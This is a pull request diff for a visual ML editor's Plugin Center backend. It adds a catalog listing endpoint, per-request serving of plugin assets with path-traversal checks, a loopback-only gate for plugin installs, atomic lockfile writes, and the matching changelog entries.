### PR TITLE
feat(plugins): the Plugin Center's backend contract — catalog listing, core package, per-request assets

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -22,6 +22,77 @@ received — each links to the release it was published as.
 
 ## [Unreleased]
 
+### Added
+
+- **`GET /api/plugins/catalog` — everything you can install and everything
+  you have installed, in one listing.** The read half of the Plugin Center.
+  Two documents that do not know about each other answer half the question
+  each — the catalog this build ships says what can be installed by name, the
+  lockfile says what this install actually did — so they are merged once, on
+  the server, into one row per plugin with every field on every row: a card
+  never has to ask whether a key is there this time. A row says which state
+  it is in, including the two that used to be invisible: a pack you removed
+  on purpose reads `removed` rather than looking like one you have never had,
+  and an entry whose files are gone reads `missing_files` rather than drawing
+  as a normal installed row whose nodes have all silently vanished. It also
+  says what nodes the pack would add before you install it — read as text off
+  the sources, never by importing them, because importing a pack to find out
+  what is in it is exactly what installing it means. Open, like
+  `GET /api/packs`: it is a read the editor draws a panel from, and it
+  touches no network.
+
+- **Three official plugins install by name.** `graph-copilot`,
+  `self-learning` and `official-template` are in the catalog, so
+  `cdui plugin search` lists them and `cdui plugin install self-learning`
+  fetches the repository the catalog names instead of asking anyone to
+  remember `CodefyUI/CodefyUI-Plugin-Self-Learning`. The badge saying
+  CodefyUI vouches for a plugin is earned by where the files came FROM, not
+  by the id on its manifest: those ids are deliberately not reserved — an
+  official plugin's own author has to be able to install their own
+  repository under its own id — so a pack fetched from anywhere else that
+  claims `self-learning` is listed as exactly what it is.
+
+- **`CODEFYUI_GITHUB_TOKEN` and `CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL`.**
+  Unauthenticated GitHub allows sixty requests an hour per IP, which a
+  classroom behind one NAT can exhaust in a morning; export a token and the
+  plugin installer's GitHub calls use it. It is read per call, so a token
+  exported after the server started still works, and no copy of it is kept.
+  The second is the same loopback gate the Package Center has, for the
+  install routes landing next: installing a plugin puts third-party code
+  where this process will import it, so the answer to "who may install one"
+  is "whoever is sitting at this machine" unless a deliberate classroom or
+  lab server opts back in with `CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL=1`.
+
+### Changed
+
+- **The plugin rules the CLI owned now live in the backend.** What a manifest
+  may say, what `owner/repo@ref` means, which packs the catalog ships, which
+  imports the sandbox gate refuses — all of it lived in `scripts/plugins.py`,
+  which the server cannot import, so a Plugin Center in the browser would
+  have had to grow a second copy of every one of those rules, and a second
+  copy of a security rule is the kind that drifts quietly. They moved to
+  `backend/app/core/plugins/` and `cdui plugin` became a front end over them:
+  same commands, same output, same refusals, and every test the CLI already
+  had still passes untouched, which is what says so.
+
+- **The Package Center's job runner is shared code.** The one-job-at-a-time
+  runner with a cursor and a long poll that `backend/app/core/packs/` had is
+  now `app.core.jobs`, so the plugin installer landing next runs under the
+  same lock rules rather than a second copy of them. Nothing about installing
+  a pack changes.
+
+### Fixed
+
+- **A plugin installed while the server was running served 404 for its
+  `assets/` until a restart.** Every installed plugin's `assets/` directory
+  was attached to the server once, at startup, so a pack that arrived
+  afterwards — which is the entire premise of installing one from inside the
+  app — had a URL for each CSV and image it shipped and nothing behind it
+  until someone restarted. `/plugins/<id>/assets/<file>` is now served by a
+  route that looks the plugin up per request: the same URL and the same
+  files, but a pack is servable the moment it is installed, and a pack you
+  disable stops serving its files at once rather than at the next restart.
+
 ## [2.5.0] — 2026-09-01
 
 Twenty-four commits since 2.4.1, around three themes. The Package Center

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -45,12 +45,16 @@ received — each links to the release it was published as.
   `self-learning` and `official-template` are in the catalog, so
   `cdui plugin search` lists them and `cdui plugin install self-learning`
   fetches the repository the catalog names instead of asking anyone to
-  remember `CodefyUI/CodefyUI-Plugin-Self-Learning`. The badge saying
-  CodefyUI vouches for a plugin is earned by where the files came FROM, not
-  by the id on its manifest: those ids are deliberately not reserved — an
-  official plugin's own author has to be able to install their own
-  repository under its own id — so a pack fetched from anywhere else that
-  claims `self-learning` is listed as exactly what it is.
+  remember `CodefyUI/CodefyUI-Plugin-Self-Learning`. Each of those ids is
+  reserved *to* the repository the catalog names it with: the plugin's own
+  author can still install their own repository under its own id, and a fork
+  claiming `self-learning` is refused instead of quietly taking the official
+  pack's place. Installing by name also checks that the repository's manifest
+  declares the id the catalog advertised, so a card can never describe one
+  pack while the install fetches another. And the badge saying CodefyUI
+  vouches for a plugin is earned by where the files came FROM, not by the id
+  on a manifest, so a pack installed from anywhere else is listed as exactly
+  what it is.
 
 - **`CODEFYUI_GITHUB_TOKEN` and `CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL`.**
   Unauthenticated GitHub allows sixty requests an hour per IP, which a
@@ -72,8 +76,13 @@ received — each links to the release it was published as.
   have had to grow a second copy of every one of those rules, and a second
   copy of a security rule is the kind that drifts quietly. They moved to
   `backend/app/core/plugins/` and `cdui plugin` became a front end over them:
-  same commands, same output, same refusals, and every test the CLI already
-  had still passes untouched, which is what says so.
+  the same commands and the same output wherever a test asserted it — every
+  test the CLI already had still passes untouched, which is what says so —
+  plus a few refusals that got sharper. `cdui plugin link` and
+  `cdui plugin new` now refuse an id that names a route under
+  `/api/plugins/`, which is an id no plugin could ever be reached under; and
+  a downloaded tarball holding more than one top-level directory is refused
+  rather than installed from whichever one the filesystem listed first.
 
 - **The Package Center's job runner is shared code.** The one-job-at-a-time
   runner with a cursor and a long poll that `backend/app/core/packs/` had is
@@ -83,15 +92,33 @@ received — each links to the release it was published as.
 
 ### Fixed
 
-- **A plugin installed while the server was running served 404 for its
-  `assets/` until a restart.** Every installed plugin's `assets/` directory
-  was attached to the server once, at startup, so a pack that arrived
-  afterwards — which is the entire premise of installing one from inside the
-  app — had a URL for each CSV and image it shipped and nothing behind it
-  until someone restarted. `/plugins/<id>/assets/<file>` is now served by a
-  route that looks the plugin up per request: the same URL and the same
-  files, but a pack is servable the moment it is installed, and a pack you
-  disable stops serving its files at once rather than at the next restart.
+- **A plugin's `assets/` were served from a mount built at startup — and in a
+  released build, never served at all.** Every installed plugin's `assets/`
+  directory was attached to the server once, while the startup lifespan ran,
+  so a pack that arrived afterwards — which is the entire premise of
+  installing one from inside the app — had a URL for each CSV and image it
+  shipped and nothing behind it until someone restarted. In a released build
+  it was worse than that everywhere: the single-page-app catch-all is
+  registered when the app module is imported and those mounts only when the
+  lifespan runs, and routes match in registration order, so every
+  `/plugins/<id>/assets/<file>` was answered by the catch-all with the
+  editor's own `index.html` and a 200 — a node reading its pack's CSV was
+  handed a web page. `/plugins/<id>/assets/<file>` is now served by a route
+  that looks the plugin up per request: the same URL and the same files, but
+  a pack is servable the moment it is installed, and a pack you disable stops
+  serving its files at once rather than at the next restart.
+
+- **One unreadable manifest emptied the plugin list, and the lockfile was
+  written in place.** A `cdui.plugin.toml` with a byte that is not UTF-8
+  raised out of the reader that promises to answer "no metadata", so a single
+  malformed pack took `GET /api/plugins` and `cdui plugin list` down with it
+  instead of showing up as a pack with nothing to say. And the lockfile — the
+  only record of what you have installed — was rewritten in place, so a
+  crash, a full disk or a killed process partway through left half a JSON
+  document, which reads back as *no plugins at all* while every one of their
+  directories is still on disk. It is now written beside itself and renamed
+  atomically, so a reader sees the old file or the new one and never the
+  write in progress.
 
 ## [2.5.0] — 2026-09-01
 

--- a/backend/app/api/routes_custom_nodes.py
+++ b/backend/app/api/routes_custom_nodes.py
@@ -6,11 +6,8 @@ from pathlib import Path
 from fastapi import APIRouter, HTTPException, UploadFile
 
 from ..config import settings
-from ..core.node_registry import registry
-from ..core import plugin_loader
-from ..core.plugin_loader import rediscover_all
 from ..core.plugin_validator import PluginValidationError, validate_python_source
-from ..core.preset_registry import preset_registry
+from ..core.plugins.reload import rediscover_now
 from ..core.script_policy import TIER0_DENIED_ATTRS
 
 logger = logging.getLogger(__name__)
@@ -153,16 +150,8 @@ async def delete_custom_node(filename: str):
 def _reload_all():
     """Re-discover all nodes and presets after a custom node change.
 
-    Delegates to :func:`rediscover_all` so plugins stay registered when a
-    custom node is added/toggled (otherwise ``registry.clear()`` would
-    silently drop them from the palette).
+    Delegates to :func:`~app.core.plugins.reload.rediscover_now` so plugins
+    stay registered when a custom node is added/toggled (otherwise
+    ``registry.clear()`` would silently drop them from the palette).
     """
-    rediscover_all(
-        registry,
-        preset_registry,
-        nodes_dir=settings.NODES_DIR,
-        custom_nodes_dir=settings.CUSTOM_NODES_DIR,
-        presets_dir=settings.PRESETS_DIR,
-        builtin_root=plugin_loader.plugins_builtin_root(),
-        user_root=plugin_loader.plugins_user_root(),
-    )
+    rediscover_now()

--- a/backend/app/api/routes_packs.py
+++ b/backend/app/api/routes_packs.py
@@ -44,6 +44,7 @@ from fastapi.responses import JSONResponse
 from pydantic import BaseModel, ConfigDict, field_validator
 
 from ..config import settings
+from ..core.auth import bound_to_loopback
 from ..core.packs import catalog, flows, restart, state
 from ..core.packs.catalog import ModelItem, Pack
 from ..core.packs.errors import (
@@ -61,11 +62,6 @@ from ..core.packs.service import (
 from ..core.packs.state import ItemState, PackState
 
 router = APIRouter(prefix="/api/packs", tags=["packs"])
-
-#: Bind addresses that mean "this machine only". ``0.0.0.0`` and ``::`` are
-#: deliberately absent: they are wildcards, reachable from the LAN, and a
-#: server on one of them is exactly the case this gate exists for.
-_LOOPBACK_HOSTS = frozenset({"127.0.0.1", "localhost", "::1"})
 
 _REMOTE_REFUSAL = (
     "Installing packs is only allowed from the computer that runs the "
@@ -112,8 +108,7 @@ class InstallRequest(BaseModel):
 
 def remote_install_allowed() -> bool:
     """May a request start an install at all, given how the server is bound?"""
-    host = settings.HOST.strip().strip("[]").lower()
-    return host in _LOOPBACK_HOSTS or bool(settings.ALLOW_REMOTE_PACK_INSTALL)
+    return bound_to_loopback() or bool(settings.ALLOW_REMOTE_PACK_INSTALL)
 
 
 def _require_local_install() -> None:

--- a/backend/app/api/routes_plugin_frontend.py
+++ b/backend/app/api/routes_plugin_frontend.py
@@ -1,16 +1,37 @@
-"""Serve plugin-shipped frontend bundles.
+"""Serve the files a plugin ships: its frontend bundle and its ``assets/``.
 
-Unlike the ``assets/`` StaticFiles mounts (created once at startup), this
-route resolves the plugin directory on every request from the lockfile, so
-a plugin installed while the server is running is servable immediately
-after ``POST /api/plugins/reload`` -- no restart, no remount.
+Both routes resolve the plugin directory from the lockfile on EVERY request,
+and that is their whole reason for existing. ``assets/`` used to be one
+``StaticFiles`` mount per plugin, built once in the startup lifespan, so a
+plugin installed while the server was running served 404 for every CSV and
+image it shipped until somebody restarted -- which is precisely the thing a
+Plugin Center in the browser exists to avoid. A route reads the lockfile
+that ``POST /api/plugins/reload`` has just rewritten, so a pack is servable
+the moment it is installed, and stops being servable the moment it is
+uninstalled.
+
+Enabled plugins only, on both routes: ``iter_plugin_dirs`` skips disabled
+entries by default, which is what makes ``POST /api/plugins/{id}/disable``
+mean what its docstring promises -- the pack's files stop being served, not
+just its nodes stop being registered.
+
+Traversal is the same discipline in both, and it is ``resolve``-then-compare
+rather than a check on the string that arrived: ``..`` has several spellings
+over the wire, and a symlink inside a pack is not one of them at all. Only a
+real file that is still inside the directory is served -- never a directory
+itself.
 
 Windows note: ``mimetypes`` can map ``.js`` to ``text/plain`` depending on
-registry state, which makes browsers reject ESM imports. Media types for
-the handful of bundle extensions are pinned explicitly.
+registry state, which makes browsers reject ESM imports. Media types for the
+handful of bundle extensions are pinned explicitly here; assets are anything
+a pack cares to ship, so they answer from ``mimetypes``, whose Windows
+entries :mod:`app.main` corrects at import.
 """
 
 from __future__ import annotations
+
+import mimetypes
+from pathlib import Path
 
 from fastapi import APIRouter, HTTPException
 from fastapi.responses import FileResponse
@@ -33,30 +54,91 @@ _MEDIA_TYPES = {
     ".json": "application/json",
 }
 
+# Plugin files ship under fixed names (frontend/index.js, assets/data.csv)
+# and change on `cdui plugin update`, so they must be revalidated -- without
+# this header browsers heuristically cache (ETag/Last-Modified only) and keep
+# serving stale plugin code and stale data after an update. "no-cache" still
+# allows caching but forces revalidation; FileResponse answers conditional
+# requests with 304 when the file is unchanged.
+_REVALIDATE = {"Cache-Control": "no-cache"}
 
-@router.get("/{plugin_id}/frontend/{resource_path:path}")
-async def serve_plugin_frontend(plugin_id: str, resource_path: str) -> FileResponse:
+
+def _enabled_plugin_dir(plugin_id: str) -> Path | None:
+    """Where *plugin_id* is installed, if it is installed AND enabled.
+
+    The lockfile is read here rather than cached anywhere, because the answer
+    is allowed to change between two requests: an install writes an entry, an
+    uninstall removes one, and ``disable`` flips a flag. One helper for both
+    routes so they cannot come to disagree about which plugins are servable.
+    """
     lockfile = load_lockfile()
     for pid, plugin_dir in iter_plugin_dirs(
         plugin_loader.plugins_builtin_root(), plugin_loader.plugins_user_root(), lockfile
     ):
-        if pid != plugin_id:
-            continue
-        if frontend_entry_rel(read_manifest_safe(plugin_dir)) is None:
-            break
-        base = (plugin_dir / "frontend").resolve()
-        target = (base / resource_path).resolve()
-        if not target.is_relative_to(base) or not target.is_file():
-            break
-        # Plugin bundles ship under a fixed filename (e.g. frontend/index.js)
-        # and change on `cdui plugin update`, so they must be revalidated --
-        # without this header browsers heuristically cache (ETag/Last-Modified
-        # only) and keep serving stale plugin code after an update. "no-cache"
-        # still allows caching but forces revalidation; FileResponse answers
-        # conditional requests with 304 when the file is unchanged.
-        return FileResponse(
-            target,
-            media_type=_MEDIA_TYPES.get(target.suffix.lower()),
-            headers={"Cache-Control": "no-cache"},
-        )
+        if pid == plugin_id:
+            return plugin_dir
+    return None
+
+
+def _file_under(directory: Path, resource_path: str) -> Path | None:
+    """The file *resource_path* names inside *directory*, or ``None``.
+
+    ``None`` covers every way this can fail to be a file the caller may have
+    -- the directory does not exist, the path escapes it, the file is not
+    there, it is a directory -- because from outside they are all one answer:
+    404. Distinguishing them in the response would tell a caller which paths
+    exist above the plugin's own directory.
+    """
+    base = directory.resolve()
+    target = (base / resource_path).resolve()
+    if not target.is_relative_to(base) or not target.is_file():
+        return None
+    return target
+
+
+@router.get("/{plugin_id}/frontend/{resource_path:path}")
+async def serve_plugin_frontend(plugin_id: str, resource_path: str) -> FileResponse:
+    """A file out of an enabled plugin's ``frontend/`` directory.
+
+    Gated on the manifest declaring a ``[frontend]`` entry: a pack with no
+    browser code has no bundle to serve, and answering out of a directory it
+    happens to have called ``frontend`` would serve files the manifest never
+    offered.
+    """
+    plugin_dir = _enabled_plugin_dir(plugin_id)
+    if plugin_dir is not None and (
+        frontend_entry_rel(read_manifest_safe(plugin_dir)) is not None
+    ):
+        target = _file_under(plugin_dir / "frontend", resource_path)
+        if target is not None:
+            return FileResponse(
+                target,
+                media_type=_MEDIA_TYPES.get(target.suffix.lower()),
+                headers=_REVALIDATE,
+            )
     raise HTTPException(status_code=404, detail="Plugin frontend resource not found")
+
+
+@router.get("/{plugin_id}/assets/{resource_path:path}")
+async def serve_plugin_asset(plugin_id: str, resource_path: str) -> FileResponse:
+    """A file out of an enabled plugin's ``assets/`` directory.
+
+    No manifest gate: ``assets/`` is a directory a pack either has or has
+    not, and a node that ships a CSV reads it through this URL without
+    declaring anything. The media type is whatever ``mimetypes`` says, and
+    ``application/octet-stream`` when it says nothing -- a pack may ship a
+    ``.npz`` or a ``.pt`` as readily as a ``.png``, and a browser downloading
+    an unknown type is right where guessing would not be.
+    """
+    plugin_dir = _enabled_plugin_dir(plugin_id)
+    if plugin_dir is not None:
+        target = _file_under(plugin_dir / "assets", resource_path)
+        if target is not None:
+            return FileResponse(
+                target,
+                media_type=(
+                    mimetypes.guess_type(str(target))[0] or "application/octet-stream"
+                ),
+                headers=_REVALIDATE,
+            )
+    raise HTTPException(status_code=404, detail="Plugin asset not found")

--- a/backend/app/api/routes_plugin_frontend.py
+++ b/backend/app/api/routes_plugin_frontend.py
@@ -88,9 +88,21 @@ def _file_under(directory: Path, resource_path: str) -> Path | None:
     there, it is a directory -- because from outside they are all one answer:
     404. Distinguishing them in the response would tell a caller which paths
     exist above the plugin's own directory.
+
+    ``resolve`` is where a path stops being a string, and it is the one call
+    here that can refuse the string outright: an embedded NUL (``%00`` over
+    the wire, on an OPEN route) raises ``ValueError``, and a path the
+    operating system will not look up raises ``OSError``. Both are caught for
+    the same reason the checks below exist -- "there is no such file" is the
+    honest answer, and letting either escape turns a 404 into a 500 with a
+    traceback in the server's log for anyone who can reach the port. The
+    ``StaticFiles`` mount this replaced answered 404 for it.
     """
-    base = directory.resolve()
-    target = (base / resource_path).resolve()
+    try:
+        base = directory.resolve()
+        target = (base / resource_path).resolve()
+    except (OSError, ValueError):
+        return None
     if not target.is_relative_to(base) or not target.is_file():
         return None
     return target

--- a/backend/app/api/routes_plugin_frontend.py
+++ b/backend/app/api/routes_plugin_frontend.py
@@ -119,7 +119,15 @@ async def serve_plugin_frontend(plugin_id: str, resource_path: str) -> FileRespo
     raise HTTPException(status_code=404, detail="Plugin frontend resource not found")
 
 
-@router.get("/{plugin_id}/assets/{resource_path:path}")
+#: Declared twice below rather than as one two-method route: FastAPI derives
+#: one operation id per ROUTE, so ``methods=["GET", "HEAD"]`` puts the same id
+#: on two OpenAPI operations -- a warning at schema build, and generated
+#: clients that collide on it.
+_ASSET_PATH = "/{plugin_id}/assets/{resource_path:path}"
+
+
+@router.get(_ASSET_PATH)
+@router.head(_ASSET_PATH)
 async def serve_plugin_asset(plugin_id: str, resource_path: str) -> FileResponse:
     """A file out of an enabled plugin's ``assets/`` directory.
 
@@ -129,6 +137,12 @@ async def serve_plugin_asset(plugin_id: str, resource_path: str) -> FileResponse
     ``application/octet-stream`` when it says nothing -- a pack may ship a
     ``.npz`` or a ``.pt`` as readily as a ``.png``, and a browser downloading
     an unknown type is right where guessing would not be.
+
+    ``HEAD`` is declared because this URL was a ``StaticFiles`` mount, which
+    answered it, and replacing the mount is not supposed to take anything
+    away: something that asks how big a dataset is before downloading it must
+    keep getting an answer. (The bundle route above never had a mount behind
+    it and stays a plain ``GET``.)
     """
     plugin_dir = _enabled_plugin_dir(plugin_id)
     if plugin_dir is not None:

--- a/backend/app/api/routes_plugins.py
+++ b/backend/app/api/routes_plugins.py
@@ -20,8 +20,8 @@ from ..core.plugin_loader import (
     is_enabled,
     iter_plugin_dirs,
     load_lockfile,
-    save_lockfile,
 )
+from ..core.plugins import lifecycle
 from ..core.plugins.reload import rediscover_now
 
 logger = logging.getLogger(__name__)
@@ -144,20 +144,17 @@ async def reload_plugins() -> dict[str, int]:
 def _set_plugin_enabled(plugin_id: str, enabled: bool) -> dict[str, Any]:
     """Shared implementation behind the two toggle endpoints.
 
-    Returns the new lockfile entry on success; raises HTTPException 404
-    when the plugin is not installed. Hot-reloads the registry so the
-    change is immediately visible without restarting the server.
+    Returns the new state on success; raises HTTPException 404 when the
+    plugin is not installed. Hot-reloads the registry so the change is
+    immediately visible without restarting the server -- including when the
+    flag was already in the requested state, because a client that asks
+    twice is usually a client whose registry disagrees with the lockfile.
     """
-    lockfile = load_lockfile()
-    entry = lockfile.get("plugins", {}).get(plugin_id)
-    if not entry:
+    if lifecycle.set_enabled(plugin_id, enabled) is None:
         raise HTTPException(
             status_code=404,
             detail=f"Plugin '{plugin_id}' is not installed",
         )
-
-    entry["enabled"] = enabled
-    save_lockfile(lockfile)
 
     rediscover_now()
     return {"id": plugin_id, "enabled": enabled}

--- a/backend/app/api/routes_plugins.py
+++ b/backend/app/api/routes_plugins.py
@@ -32,7 +32,6 @@ from ..core.auth import bound_to_loopback
 from ..core.node_registry import registry
 from ..core import plugin_loader
 from ..core.plugin_loader import (
-    frontend_entry_rel,
     is_enabled,
     iter_plugin_dirs,
     load_lockfile,
@@ -41,6 +40,7 @@ from ..core.plugins import lifecycle
 from ..core.plugins.catalog import catalog_entries
 from ..core.plugins.listing import (
     catalog_listing,
+    frontend_entry_url,
     installed_facts,
     nodes_for_plugin,
 )
@@ -102,10 +102,6 @@ async def list_plugins() -> list[dict[str, Any]]:
         plugin_meta = manifest.get("plugin", {})
         lessons_meta = manifest.get("lessons", {})
         enabled = is_enabled(entry)
-        entry_rel = frontend_entry_rel(manifest)
-        frontend_entry = None
-        if enabled and entry_rel and (plugin_dir / entry_rel).is_file():
-            frontend_entry = f"/plugins/{plugin_id}/{entry_rel}"
         out.append({
             "id": plugin_id,
             "name": plugin_meta.get("name", plugin_id),
@@ -121,7 +117,9 @@ async def list_plugins() -> list[dict[str, Any]]:
             "chapters": lessons_meta.get("chapters", []),
             "lessons": lessons_meta.get("lessons", []),
             "nodes": nodes_for_plugin(plugin_id, registry),
-            "frontend_entry": frontend_entry,
+            "frontend_entry": frontend_entry_url(
+                plugin_id, plugin_dir, manifest, enabled=enabled
+            ),
             # Additive (the six fields the Plugin Center needs on a row it
             # can act on), computed by the same rules /catalog uses.
             **installed_facts(plugin_id, entry, manifest, catalog),

--- a/backend/app/api/routes_plugins.py
+++ b/backend/app/api/routes_plugins.py
@@ -1,9 +1,23 @@
-"""API routes for inspecting installed CodefyUI plugins.
+"""API routes for the Plugin Center: what is installed, and what could be.
 
-Read-only listing endpoints plus a hot-reload trigger that mirrors
-``POST /api/nodes/reload``. Actual install/uninstall happens in the
-``cdui plugin`` CLI (writes the lockfile + files on disk, then POSTs
-to ``/api/plugins/reload``).
+    GET  /api/plugins             every INSTALLED plugin, enabled or not
+    GET  /api/plugins/catalog     the same rows merged with what this build
+                                  can install by name -- what the panel draws
+    GET  /api/plugins/generation  the reload counter the editor polls
+    POST /api/plugins/reload      re-discover nodes, presets and packs
+    GET  /api/plugins/{id}        one plugin's manifest, nodes and README
+    POST /api/plugins/{id}/enable|disable
+
+Every fixed path is declared before ``/{plugin_id}``; see the comment above
+that route for why the order is load-bearing rather than tidy.
+
+Reads are open GETs, like every other read the editor polls. Installing is
+not here yet: it still happens in the ``cdui plugin`` CLI, which writes the
+lockfile and the files and then POSTs to ``/api/plugins/reload``. What IS
+here is the gate the install routes will hang off --
+``_require_local_plugin_install`` -- because installing a plugin puts
+third-party code where this process will import it, and that is not a thing
+a stranger on the LAN gets to start.
 """
 
 from __future__ import annotations
@@ -13,6 +27,8 @@ from typing import Any
 
 from fastapi import APIRouter, HTTPException
 
+from ..config import settings
+from ..core.auth import bound_to_loopback
 from ..core.node_registry import registry
 from ..core import plugin_loader
 from ..core.plugin_loader import (
@@ -22,26 +38,45 @@ from ..core.plugin_loader import (
     load_lockfile,
 )
 from ..core.plugins import lifecycle
+from ..core.plugins.catalog import catalog_entries
+from ..core.plugins.listing import (
+    catalog_listing,
+    installed_facts,
+    nodes_for_plugin,
+)
 from ..core.plugins.reload import rediscover_now
 
 logger = logging.getLogger(__name__)
 
 router = APIRouter(prefix="/api/plugins", tags=["plugins"])
 
+_REMOTE_REFUSAL = (
+    "Installing plugins is only allowed from the computer that runs the "
+    "server. Set CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL=1 to override.")
 
-def _provider_token(plugin_id: str) -> str:
-    """The ``cdui_plugins.<X>`` slot, kebab → snake."""
-    return plugin_id.replace("-", "_")
+
+def remote_plugin_install_allowed() -> bool:
+    """May a request install a plugin at all, given how the server is bound?
+
+    Installing a plugin puts third-party code where this process will import
+    it, so the audience for that is "whoever is at this machine" rather than
+    "whoever can reach the port" -- the same rule ``/api/packs`` applies to
+    starting a package install, asked through the same helper so the two
+    cannot drift apart.
+    """
+    return bound_to_loopback() or bool(settings.ALLOW_REMOTE_PLUGIN_INSTALL)
 
 
-def _nodes_for_plugin(plugin_id: str) -> list[str]:
-    token = _provider_token(plugin_id)
-    prefix = f"cdui_plugins.{token}."
-    return sorted(
-        cls.NODE_NAME
-        for cls in registry.nodes.values()
-        if (cls.__module__ or "").startswith(prefix)
-    )
+async def _require_local_plugin_install() -> None:
+    """Dependency for every route that installs or removes a plugin.
+
+    Not attached to anything yet: this PR adds the read half of the Plugin
+    Center. It is defined and tested here so the install routes cannot land
+    without it -- a gate written in the same PR as the route it guards is a
+    gate a reviewer reads as boilerplate.
+    """
+    if not remote_plugin_install_allowed():
+        raise HTTPException(status_code=403, detail=_REMOTE_REFUSAL)
 
 
 @router.get("")
@@ -54,6 +89,7 @@ async def list_plugins() -> list[dict[str, Any]]:
     because they are not in the registry.
     """
     lockfile = load_lockfile()
+    catalog = catalog_entries()
     out: list[dict[str, Any]] = []
     for plugin_id, plugin_dir in iter_plugin_dirs(
         plugin_loader.plugins_builtin_root(),
@@ -84,10 +120,36 @@ async def list_plugins() -> list[dict[str, Any]]:
             "homepage": plugin_meta.get("homepage", ""),
             "chapters": lessons_meta.get("chapters", []),
             "lessons": lessons_meta.get("lessons", []),
-            "nodes": _nodes_for_plugin(plugin_id),
+            "nodes": nodes_for_plugin(plugin_id, registry),
             "frontend_entry": frontend_entry,
+            # Additive (the six fields the Plugin Center needs on a row it
+            # can act on), computed by the same rules /catalog uses.
+            **installed_facts(plugin_id, entry, manifest, catalog),
         })
     return out
+
+
+@router.get("/catalog")
+async def plugin_catalog() -> dict[str, Any]:
+    """Every plugin this build can install, and everything installed.
+
+    The one route the Plugin Center polls, and the reason it is a GET: like
+    ``GET /api/packs`` it is a read the editor draws a panel from, so it
+    carries no session token. Declared before ``/{plugin_id}`` -- ``catalog``
+    is a reserved plugin id precisely because a pack with that name would
+    otherwise sit where this route lives, and the router, not the pack, would
+    decide which one wins.
+
+    ``active_job`` is ``None`` until the install routes land; the field is
+    here now so the panel is written against the final shape.
+    """
+    return catalog_listing(
+        load_lockfile(),
+        registry=registry,
+        active_job=None,
+        remote_install_allowed=remote_plugin_install_allowed(),
+        generation=plugin_loader.reload_generation(),
+    )
 
 
 @router.get("/generation")
@@ -100,6 +162,20 @@ async def plugins_generation() -> dict[str, int]:
     it needs no session token.
     """
     return {"generation": plugin_loader.reload_generation()}
+
+
+@router.post("/reload")
+async def reload_plugins() -> dict[str, int]:
+    """Clear and re-discover everything (builtin + custom + plugins + presets)."""
+    return rediscover_now()
+
+
+# Everything above this line has a FIXED path; everything below takes a
+# ``{plugin_id}``. Keeping the split in that order is not a style choice --
+# Starlette matches in registration order, so a fixed path declared after
+# ``/{plugin_id}`` is reachable only because no pack is allowed to be called
+# ``reload`` (see RESERVED_PLUGIN_IDS). A structural test pins the order so
+# the next route added here cannot quietly depend on that.
 
 
 @router.get("/{plugin_id}")
@@ -125,7 +201,7 @@ async def get_plugin(plugin_id: str) -> dict[str, Any]:
             "id": plugin_id,
             "manifest": manifest,
             "lockfile_entry": lockfile["plugins"][plugin_id],
-            "nodes": _nodes_for_plugin(plugin_id),
+            "nodes": nodes_for_plugin(plugin_id, registry),
             "readme": readme,
         }
 
@@ -133,12 +209,6 @@ async def get_plugin(plugin_id: str) -> dict[str, Any]:
         status_code=404,
         detail=f"Plugin '{plugin_id}' is in the lockfile but its files are missing",
     )
-
-
-@router.post("/reload")
-async def reload_plugins() -> dict[str, int]:
-    """Clear and re-discover everything (builtin + custom + plugins + presets)."""
-    return rediscover_now()
 
 
 def _set_plugin_enabled(plugin_id: str, enabled: bool) -> dict[str, Any]:

--- a/backend/app/api/routes_plugins.py
+++ b/backend/app/api/routes_plugins.py
@@ -13,7 +13,6 @@ from typing import Any
 
 from fastapi import APIRouter, HTTPException
 
-from ..config import settings
 from ..core.node_registry import registry
 from ..core import plugin_loader
 from ..core.plugin_loader import (
@@ -21,10 +20,9 @@ from ..core.plugin_loader import (
     is_enabled,
     iter_plugin_dirs,
     load_lockfile,
-    rediscover_all,
     save_lockfile,
 )
-from ..core.preset_registry import preset_registry
+from ..core.plugins.reload import rediscover_now
 
 logger = logging.getLogger(__name__)
 
@@ -140,15 +138,7 @@ async def get_plugin(plugin_id: str) -> dict[str, Any]:
 @router.post("/reload")
 async def reload_plugins() -> dict[str, int]:
     """Clear and re-discover everything (builtin + custom + plugins + presets)."""
-    return rediscover_all(
-        registry,
-        preset_registry,
-        nodes_dir=settings.NODES_DIR,
-        custom_nodes_dir=settings.CUSTOM_NODES_DIR,
-        presets_dir=settings.PRESETS_DIR,
-        builtin_root=plugin_loader.plugins_builtin_root(),
-        user_root=plugin_loader.plugins_user_root(),
-    )
+    return rediscover_now()
 
 
 def _set_plugin_enabled(plugin_id: str, enabled: bool) -> dict[str, Any]:
@@ -169,15 +159,7 @@ def _set_plugin_enabled(plugin_id: str, enabled: bool) -> dict[str, Any]:
     entry["enabled"] = enabled
     save_lockfile(lockfile)
 
-    rediscover_all(
-        registry,
-        preset_registry,
-        nodes_dir=settings.NODES_DIR,
-        custom_nodes_dir=settings.CUSTOM_NODES_DIR,
-        presets_dir=settings.PRESETS_DIR,
-        builtin_root=plugin_loader.plugins_builtin_root(),
-        user_root=plugin_loader.plugins_user_root(),
-    )
+    rediscover_now()
     return {"id": plugin_id, "enabled": enabled}
 
 

--- a/backend/app/config.py
+++ b/backend/app/config.py
@@ -182,6 +182,20 @@ class Settings(BaseSettings):
     # since every mutating pack route already needs the session token.
     ALLOW_REMOTE_PACK_INSTALL: bool = False
 
+    # ── Plugin Center ──────────────────────────────────────────────────
+    # Let a request from another machine install a plugin. OFF by default,
+    # and this is the most privileged thing the app does: installing a plugin
+    # puts third-party code where this process will import it, and may run a
+    # package manager against the interpreter serving the request. So the
+    # answer to "who may install a plugin" is "whoever is sitting at this
+    # machine", not "whoever can reach the port". With HOST on loopback (the
+    # shipped default) the question never arises -- the gate only binds when
+    # the server was deliberately put on 0.0.0.0 or a LAN address. A
+    # classroom or lab server that serves the LAN on purpose opts back in
+    # with CODEFYUI_ALLOW_REMOTE_PLUGIN_INSTALL=1; it changes nothing else,
+    # since every mutating plugin route already needs the session token.
+    ALLOW_REMOTE_PLUGIN_INSTALL: bool = False
+
     # ── Port statistics (#129) ─────────────────────────────────────────
     # GET /api/execution/outputs/{run}/{node}/{port}/stats summarises a
     # captured value instead of shipping it. Above this element count the

--- a/backend/app/core/auth.py
